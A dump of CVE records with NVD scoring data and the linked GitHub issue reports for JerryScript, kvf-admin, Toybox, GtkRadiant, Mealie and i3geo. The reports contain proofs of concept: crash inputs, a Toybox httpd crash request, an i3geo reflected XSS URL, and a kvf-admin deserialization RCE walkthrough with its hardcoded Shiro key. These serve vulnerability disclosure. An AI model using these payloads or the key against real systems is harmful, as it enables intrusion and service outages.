[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/5008
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 0d4969661810b9e618485c284c361e597144e9b9 master ###### Build platform Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es.next --stack-limit=15 --debug --logging=on --line-info=on ``` ###### Test case ```javascript for (let __v1 = 0; __v1 < 10000; __v1++) { ['__v6', '__v2', '__v1', '__v3', '__v4', '__v5'];" __v5(__v1, } ``` ```sh ==112046==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda03d5390 at pc 0x7fa6aae1ea7d bp 0x7ffda03d5240 sp 0x7ffda03d49e8 READ of size 1 at 0x7ffda03d5390 thread T0 #0 0x7fa6aae1ea7c in __interceptor_strtol (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x75a7c) #1 0x581203 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:247 #2 0x4027c1 in main /home/lily/Desktop/67/jerryscript/jerry-main/main-desktop.c:172 #3 0x7fa6aa6f683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x401e88 in _start (/home/lily/Desktop/67/jerry+0x401e88) Address 0x7ffda03d5390 is located in stack of thread T0 at offset 224 in frame #0 0x580e99 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:204 This frame has 3 object(s): [32, 36) 'source_size' [96, 104) 'current_p' [160, 224) 'buffer_p' <== Memory access at offset 224 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 __interceptor_strtol Shadow bytes around the buggy address: 0x100034072a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a50: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 0x100034072a60: f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 =>0x100034072a70: 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 0x100034072a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==112046==ABORTING
Stack-buffer-overflow in jerryx_print_unhandled_exception (jerryscript/jerry-ext/util/print.c)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5008/comments
1
2022-05-29T18:17:00Z
2022-08-08T06:14:38Z
https://github.com/jerryscript-project/jerryscript/issues/5008
1,251,957,111
5,008
3,837
CVE-2022-35857
2022-07-13T22:15:09.060
kvf-admin through 2022-02-12 allows remote attackers to execute arbitrary code because deserialization is mishandled. The rememberMe parameter is encrypted with a hardcoded key from the com.kalvin.kvf.common.shiro.ShiroConfig file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kalvinGit/kvf-admin/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kalvinGit/kvf-admin/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kvf-admin_project:kvf-admin:*:*:*:*:*:*:*:*", "matchCriteriaId": "2664551A-27E9-4D70-A84A-DA72BD4CF6C7", "versionEndExcluding": null, "versionEndIncluding": "2022-02-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/kalvinGit/kvf-admin/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kalvinGit", "kvf-admin" ]
The author sets a fixed key in the com.kalvin.kvf.common.shiro.ShiroConfig file and uses this key to encrypt the rememberMe parameter in the cookie. This situation can cause a deserialization attack with very serious consequences. <img width="942" alt="2" src="https://user-images.githubusercontent.com/75016675/178397308-92b9fdda-b207-4ae3-8cef-8b573afe0770.png"> Set up a local environment for attacks. When the attacker logs in and selects remember me, the cookie will have the rememberMe field <img width="948" alt="3" src="https://user-images.githubusercontent.com/75016675/178397332-70b7b223-4d56-43b3-b90f-12a18f153616.png"> Blast the field and find that the encoded key is 2AvVhdsgUs0FSA3SDFAdag==, which is the same as the one set in the source code After an audit, I found that the source code contains commons-beanutils-1.9.4.jar dependency, which is actually a dependency included in shiro. Using this dependency, it is possible to generate a deserialized payload and then encrypt the payload using the key obtained by blasting. Finally, write this payload after the rememberMe field and attack it. Successful RCE <img width="1046" alt="00" src="https://user-images.githubusercontent.com/75016675/178397794-162bbe68-8ebb-47c9-8119-80010b98626f.png"> Note that the JSESSIONID in the cookie field should be deleted, otherwise the system will make judgments directly based on the JSESSIONID.
There is a deserialization vulnerability that can cause RCE
https://api.github.com/repos/kalvinGit/kvf-admin/issues/16/comments
1
2022-07-12T02:50:44Z
2024-03-28T02:04:03Z
https://github.com/kalvinGit/kvf-admin/issues/16
1,301,463,910
16
3,838
CVE-2022-32298
2022-07-14T20:15:08.660
Toybox v0.8.7 was discovered to contain a NULL pointer dereference via the component httpd.c. This vulnerability can lead to a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/landley/toybox/issues/346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/landley/toybox/issues/346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:toybox_project:toybox:0.8.7:*:*:*:*:*:*:*", "matchCriteriaId": "3FFAA4F7-F658-46C8-BB1F-47ED437929F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/landley/toybox/issues/346
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "landley", "toybox" ]
## poc ```bash GET /tar/tar.tar/.. HTTP/1.1\r\n\r\n ``` ## crash scene ```bash pwndbg> bt #0 strstart (a=a@entry=0x7fffffffdb58, b=b@entry=0x0) at lib/lib.c:506 #1 0x00005555555749f4 in isunder (dir=0x5555555bb7d4 ".", file=0x5555555cd535 "tar/tar.tar/..") at toys/net/httpd.c:86 #2 handle (infd=<optimized out>, outfd=1) at toys/net/httpd.c:132 #3 0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220 #4 0x000055555556fda1 in toybox_main () at main.c:246 #5 0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220 #6 0x000055555556fda1 in toybox_main () at main.c:246 #7 0x000055555556675f in main (argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at main.c:293 #8 0x00007ffff7c8cd90 in __libc_start_call_main (main=main@entry=0x555555566710 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at ../sysdeps/nptl/libc_start_call_main.h:58 #9 0x00007ffff7c8ce40 in __libc_start_main_impl (main=0x555555566710 <main>, argc=3, argv=0x7fffffffded8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdec8) at ../csu/libc-start.c:392 #10 0x0000555555566795 in _start () ``` ## Anaylize It seems that he did not deal with the situation that the return value of `xabspath` was `NULL`, which led to the subsequent dereferencing of this NULL, and continued to trace the location of the `xwrap.c:599` line. When the judgment here is true, it will be Return NULL. I think this error is a code path that may not be considered. But appearing in the `httpd` remote service may cause a remote denial of service. ## discoverer Taolaw@Vlab Team of Vecentek
Null pointer dereference in httpd.c
https://api.github.com/repos/landley/toybox/issues/346/comments
2
2022-05-23T05:44:46Z
2022-06-09T22:32:49Z
https://github.com/landley/toybox/issues/346
1,244,612,012
346
3,839
CVE-2022-32406
2022-07-14T21:15:08.613
GtkRadiant v1.6.6 was discovered to contain a buffer overflow via the component q3map2. This vulnerability can cause a Denial of Service (DoS) via a crafted MAP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TTimo/GtkRadiant/issues/676" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TTimo/GtkRadiant/issues/676" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gtkradiant_project:gtkradiant:1.6.6:*:*:*:*:*:*:*", "matchCriteriaId": "19DDA161-3459-4772-BCAC-5FE1DEBF7C4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/TTimo/GtkRadiant/issues/676
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "TTimo", "GtkRadiant" ]
Hi folks, A buffer overflow was found while fuzz testing of the q3map2 binary which can be triggered via a malformed MAP file with a large shader image name. Although this malformed file only crashes the program as-is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. **crash files** ``` $ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 55'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_sprintf.map $ xxd crash_sprintf.map 00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28 //.{.a p s 0.{.( 00000010: 2034 2032 2034 2029 2028 2034 2038 2034 4 2 4 ) ( 4 8 4 00000020: 2029 2028 2034 2034 2034 2029 2042 4242 ) ( 4 4 4 ) BBB 00000030: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000040: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000050: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000060: 4242 4242 2035 2030 2034 2030 207d 0a BBBB 5 0 4 0 }. or $ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 64'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_strcpy.map ``` **debug log** ``` (gdb) r crash_sprintf.map Starting program: GtkRadiant/build/release/q3map2/q3map2 crash_sprintf.map [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 2.5.17 threads: 4 Q3Map - v1.0r (c) 1999 Id Software Inc. Q3Map (ydnar) - v2.5.17 GtkRadiant - v1.6.6 Jan 9 2022 20:51:50 We're still here VFS Init: /home/test/.q3a/baseq3/ VFS Init: GtkRadiant/build/release//baseq3/ --- BSP --- Loading crash_sprintf.map entering crash_sprintf.map *** buffer overflow detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff78bb859 in __GI_abort () at abort.c:79 #2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26 #4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28 #5 0x00007ffff791e1cf in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at iovsprintf.c:35 #6 0x00007ffff792b1a4 in __GI__IO_default_xsputn (n=<optimized out>, data=<optimized out>, f=<optimized out>) at libioP.h:948 #7 __GI__IO_default_xsputn (f=0x7fffffffd680, data=<optimized out>, n=55) at genops.c:370 #8 0x00007ffff791027c in __vfprintf_internal (s=s@entry=0x7fffffffd680, format=format@entry=0x5555555dd35a "textures/%s", ap=ap@entry=0x7fffffffd7c0, mode_flags=mode_flags@entry=6) at ../libio/libioP.h:948 #9 0x00007ffff791e279 in __vsprintf_internal (string=0x7fffffffd930 "textures/", 'B' <repeats 54 times>, maxlen=<optimized out>, format=0x5555555dd35a "textures/%s", args=args@entry=0x7fffffffd7c0, mode_flags=6) at iovsprintf.c:95 #10 0x00007ffff79c6edb in ___sprintf_chk (s=<optimized out>, flag=<optimized out>, slen=<optimized out>, format=<optimized out>) at sprintf_chk.c:40 #11 0x00005555555a35de in ParseBrush () #12 0x00005555555a464f in LoadMapFile () #13 0x000055555559b824 in BSPMain () #14 0x000055555555f935 in main () (gdb) r crash_strcpy.map ... *** buffer overflow detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff78bb859 in __GI_abort () at abort.c:79 #2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26 #4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28 #5 0x00007ffff79c6cc6 in __strcpy_chk (dest=0x7fffffffd8f0 "", src=0x5555556af480 <token> 'B' <repeats 64 times>, destlen=64) at strcpy_chk.c:30 #6 0x00005555555a35ab in ParseBrush () #7 0x00005555555a464f in LoadMapFile () #8 0x000055555559b824 in BSPMain () #9 0x000055555555f935 in main () ```
Buffer overflow in q3map2 when parsing malformed MAP file
https://api.github.com/repos/TTimo/GtkRadiant/issues/676/comments
0
2022-01-12T18:10:15Z
2022-01-12T18:10:15Z
https://github.com/TTimo/GtkRadiant/issues/676
1,100,643,453
676
3,840
CVE-2022-32425
2022-07-14T22:15:08.950
The login function of Mealie v1.0.0beta-2 allows attackers to enumerate existing usernames by timing the server's response time.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hay-kot/mealie/issues/1336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hay-kot/mealie/issues/1336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mealie:mealie:1.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "1A87BAAC-D05F-4315-B961-9B4553943D81", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/hay-kot/mealie/issues/1336
[ "Third Party Advisory" ]
github.com
[ "hay-kot", "mealie" ]
### First Check - [X] This is not a feature request - [X] I added a very descriptive title to this issue. - [X] I used the GitHub search to find a similar issue and didn't find it. - [X] I searched the Mealie documentation, with the integrated search. - [X] I already read the docs and didn't find an answer. ### What is the issue you are experiencing? # Time-based user enumeration The login functionality of Mealie allows an unauthenticated user to enumerate existing accounts by timing the server's response time. The average time it takes the API server to respond is significantly lower for non-existing users than existing users. ![Pasted image 20220602164724](https://user-images.githubusercontent.com/16727235/171661525-85625b49-da7b-4720-bc9f-6fb655721c4b.png) ## Impact The impact on Mealie is low (3,7); there will only be a handful of users on any deployment of Mealie. I am assuming that the probability of finding valid usernames on a randomly exposed instance is low. The attack complexity is high, and the impact on confidentiality is low. CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N - Low 3,7 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N The vulnerability is related to CWE-203. ## Fixes ### Perform cryptographic operation Is also possible to separate the logic of checking passwords and usernames inside the core/security/security.py into two different checks. Then adding the verify_password function with some random invalid data to make sure that both checks will take a similar amount of time to complete ``` python if not user: verify_password("abc123cba321", "$2b$12$JdHtJOlkPFwyxdjdygEzPOtYmdQF5/R5tHxw5Tq8pxjubyLqdIX5i") return False if not verify_password(password, user.password): return False ``` ### Set minimum response time A possible fix would be setting a minimal randomized time that is required before the auth function returns a response code. The time should be between the fastest and slowest time it takes to calculate and compare the password hash. ![Pasted image 20220602164711](https://user-images.githubusercontent.com/16727235/171661600-3c163b92-812e-474d-909c-b93cedf3463d.png) # References https://www.hacksplaining.com/prevention/user-enumeration https://cwe.mitre.org/data/definitions/203.html https://www.cvedetails.com/vulnerability-list/cweid-203/vulnerabilities.html ### Deployment Docker (Linux), Other ### Deployment Details _No response_
[v1.0.0b] - Time based user enumeration in the /api/auth/token endpoint
https://api.github.com/repos/mealie-recipes/mealie/issues/1336/comments
1
2022-06-02T17:04:29Z
2022-06-04T18:27:31Z
https://github.com/mealie-recipes/mealie/issues/1336
1,258,460,082
1,336
3,841
CVE-2022-34092
2022-07-14T22:15:08.993
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via svg2img.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L23" }, { "source": "cve@mitre.org", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "ADD2D314-E4BD-4399-BC3E-9BDC7A780477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/edmarmoretti/i3geo/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "edmarmoretti", "i3geo" ]
Boa tarde A vulnerabilidade em questão está no arquivo svg2img.php. O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!-- Desde já agradeço a atenção. Wagner Drachinski [wagner.dracha@gmail.com](mailto:wagner.dracha@gmail.com)
Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - svg2img.php
https://api.github.com/repos/edmarmoretti/i3geo/issues/3/comments
0
2022-06-14T10:56:46Z
2022-06-14T10:56:46Z
https://github.com/edmarmoretti/i3geo/issues/3
1,270,623,978
3
3,842
CVE-2022-34093
2022-07-14T22:15:09.037
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44" }, { "source": "cve@mitre.org", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" } ]
